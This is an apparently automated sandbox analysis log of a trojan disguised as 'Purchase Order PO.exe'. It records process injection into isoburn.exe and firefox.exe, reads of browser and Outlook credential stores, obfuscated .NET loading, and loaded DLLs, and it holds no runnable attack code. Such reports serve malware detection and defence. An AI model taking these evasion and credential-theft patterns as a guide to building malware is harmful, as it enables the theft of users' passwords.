                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05084F407_2_05084F40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0508EFA07_2_0508EFA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05002FC87_2_05002FC8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CEE267_2_050CEE26
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05010E597_2_05010E59
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05022E907_2_05022E90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CCE937_2_050CCE93
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CEEDB7_2_050CEEDB
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04FF68B87_2_04FF68B8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050269627_2_05026962
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050129A07_2_050129A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050DA9A67_2_050DA9A6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0501A8407_2_0501A840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050128407_2_05012840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0503E8F07_2_0503E8F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CAB407_2_050CAB40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C6BD77_2_050C6BD7
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0500EA807_2_0500EA80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C75717_2_050C7571
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050AD5B07_2_050AD5B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050D95C37_2_050D95C3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CF43F7_2_050CF43F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050014607_2_05001460
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CF7B07_2_050CF7B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050556307_2_05055630
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C16CC7_2_050C16CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050DB16B7_2_050DB16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0504516C7_2_0504516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0501B1B07_2_0501B1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04FFF1727_2_04FFF172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050170C07_2_050170C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050BF0CC7_2_050BF0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C70E97_2_050C70E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CF0E07_2_050CF0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C132D7_2_050C132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0505739A7_2_0505739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050152A07_2_050152A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04FFD34C7_2_04FFD34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502B2C07_2_0502B2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B12ED7_2_050B12ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502D2F07_2_0502D2F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05013D407_2_05013D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C1D5A7_2_050C1D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C7D737_2_050C7D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502FDC07_2_0502FDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05089C327_2_05089C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CFCF27_2_050CFCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CFF097_2_050CFF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05011F927_2_05011F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CFFB17_2_050CFFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05019EB07_2_05019EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050A59107_2_050A5910
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050199507_2_05019950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502B9507_2_0502B950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0507D8007_2_0507D800
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050138E07_2_050138E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CFB767_2_050CFB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0502FB807_2_0502FB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05085BF07_2_05085BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_0504DBF97_2_0504DBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050CFA497_2_050CFA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050C7A467_2_050C7A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05083A6C7_2_05083A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_05055AA07_2_05055AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050ADAAC7_2_050ADAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050B1AA37_2_050B1AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050BDAC67_2_050BDAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D21C307_2_02D21C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1CAF07_2_02D1CAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1CAE87_2_02D1CAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1AE507_2_02D1AE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1AE457_2_02D1AE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1CD107_2_02D1CD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D1AD007_2_02D1AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D252C07_2_02D252C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D234D07_2_02D234D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D3B9E07_2_02D3B9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04DEE7707_2_04DEE770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04DEE2B47_2_04DEE2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04DEE3D37_2_04DEE3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04DED8387_2_04DED838
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01B1F290 appears 103 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01A8B970 appears 257 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01AE7E54 appears 99 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01B0EA12 appears 86 times
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: String function: 01AD5130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05057E54 appears 107 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0508F290 appears 103 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0507EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 04FFB970 appears 262 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05045130 appears 58 times
                Source: Purchase Order PO.exe, 00000000.00000002.1740596603.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1744164572.0000000005460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1746019565.0000000007910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000000.00000002.1741702532.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001B8D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order PO.exe
                Source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs Purchase Order PO.exe
                Source: Purchase Order PO.exeBinary or memory string: OriginalFilenameJIjm.exeB vs Purchase Order PO.exe
                Source: Purchase Order PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, RNTHW2S4uo86L5o1JA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, RNTHW2S4uo86L5o1JA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/12
                Source: C:\Users\user\Desktop\Purchase Order PO.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order PO.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\l420377xJump to behavior
                Source: Purchase Order PO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Purchase Order PO.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: isoburn.exe, 00000007.00000003.2323336714.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2328435938.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2322436960.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4169460570.00000000030A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Purchase Order PO.exeReversingLabs: Detection: 65%
                Source: Purchase Order PO.exeString found in binary or memory: 0 All OKS1 Not all required parameters are given-2 Invalid IP-Address
                Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Purchase Order PO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Purchase Order PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QfgdvbjddZ.exe, 00000006.00000002.4169230923.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4169232027.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, N8UBb3uLZruqHjVZ8x.cs.Net Code: NZHcFhG3lK System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Purchase Order PO.exe.7910000.5.raw.unpack, N8UBb3uLZruqHjVZ8x.cs.Net Code: NZHcFhG3lK System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0114EF22 pushad ; iretd 0_2_0114EF29
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_0114EEE0 push eax; iretd 0_2_0114EEE1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF36D7 push ebx; iretd 0_2_05DF36DA
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 0_2_05DF3AD9 push ebx; retf 0_2_05DF3ADA
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004148DC pushad ; retf 2_2_004148E4
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_004032C0 push eax; ret 2_2_004032C2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00426AB3 push es; retf 2_2_00426B5B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00418ABC push ebx; ret 2_2_00418ABD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00413BE9 push 00000025h; iretd 2_2_00413BF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00417C83 push edx; retf 2_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00417D07 push edx; retf 2_2_00417CC2
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00401DE9 pushad ; retf 2_2_00401E17
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00404E1D push 2A89E27Eh; ret 2_2_00404E25
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00415625 push ebp; retf 2_2_00415626
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_00404F61 push ss; ret 2_2_00404F62
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A909AD push ecx; mov dword ptr [esp], ecx2_2_01A909B6
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03295B22 push edx; retf 6_2_03295B61
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03295BA6 push edx; retf 6_2_03295B61
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03291A88 push 00000025h; iretd 6_2_03291A8F
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0329695B push ebx; ret 6_2_0329695C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_032989E9 push cs; retf 6_2_032989EA
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03296F13 push ds; retf 6_2_03296F16
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_0329277B pushad ; retf 6_2_03292783
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03282E00 push ss; ret 6_2_03282E01
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03296ED5 push 00000035h; iretd 6_2_03296EE0
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_032985C0 push ebx; ret 6_2_032985C1
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_03282CBC push 2A89E27Eh; ret 6_2_03282CC4
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeCode function: 6_2_032934C4 push ebp; retf 6_2_032934C5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_050009AD push ecx; mov dword ptr [esp], ecx7_2_050009B6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_04FD1368 push eax; iretd 7_2_04FD1369
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D303EA push EBE9D31Fh; retf 7_2_02D30403
                Source: Purchase Order PO.exeStatic PE information: section name: .text entropy: 7.872500225134944
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, aqp7ffcvundNltMO2S.csHigh entropy of concatenated method names: 'W5j28NTHW2', 'quo2u86L5o', 'C6b2HsmfaO', 'dDC2aoAqvk', 'B0021VD8hw', 'H4b2kmQhIX', 'UQETmkyP2BoWDqBFAn', 't4vFAQ5aWg1ApxaWuX', 'LNt222dQwy', 'OsU2g4Xa8O'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, DmkAepYXmip3Gmhb5O.csHigh entropy of concatenated method names: 'Dispose', 'rPr2hNTXCp', 'j8mIVStv2N', 'V6X8lEhMdQ', 'jjp2DRj75u', 'C2A2z9277R', 'ProcessDialogKey', 'MhpIZlX3xc', 'LxLI2DIMK3', 'cZlIIAjFbP'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, aVHThLTi1k5mI5OYTR.csHigh entropy of concatenated method names: 'tBo4HVuByT', 'VMC4anYFhd', 'ToString', 'v874L3UONR', 'aGm4YwKGTn', 'lEZ4fj2Rpj', 'iJV4bDreXj', 'm874NXFbMh', 'p1W48c0LwV', 'UDq4u8e79W'
                Source: 0.2.Purchase Order PO.exe.3eb31a0.3.raw.unpack, lpHqI52ckEnRBHScCjq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RHxJRoA02P', 'VYjJiY58aR', 'UPeJel4ggD', 'u67JJyH0sT', 'lAjJAkRWPb', 'OiSJXw7QY0', 'H4iJlr6ZMi'
